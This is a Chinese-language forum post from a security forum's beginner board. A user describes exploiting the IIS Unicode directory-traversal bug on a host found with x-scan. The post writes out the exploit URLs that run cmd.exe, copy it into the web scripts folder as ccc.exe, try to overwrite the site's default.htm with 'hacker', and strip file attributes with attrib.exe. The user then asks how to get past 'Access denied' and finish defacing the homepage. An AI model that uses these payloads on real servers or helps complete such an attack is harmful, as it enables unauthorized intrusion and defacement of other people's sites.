|
 | 作者: jlc [jlc]
 论坛用户 |
登录 |
| 我用x-scan扫到一个有unicode漏洞的主机:http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 我找到他的iis发布目录为c:\inetpub\wwwboot 然后我用:http://x.x.x.x./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\ccc.exe 把cmd.exe复制到了sceipts下并且改名为ccc.exe,然后我用http://x.x.x.x./scripts/ccc.exe?/c+echo+hacker+>+c:\inetpub\wwwboot\default.htm 想改掉他的主页,但返回的结果是: CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Access is denied. 我看看过一片文章上面说可能是因为defaul.htm为只读,于是我照着书上说的方法取消default.htm的只读属性:http://x.x.x.x/scripts/..%c1%1c../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\default.htm 但是返回的结果是: Access denied - C:\inetpub\wwwroot\default.htm 这到底是为什么,要用什么方法才能解决呢?怎么才能改掉他的主页呢? |
| 地主 发表时间: 05/10 16:14 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 一个用unicode漏洞入侵时候的问题!!!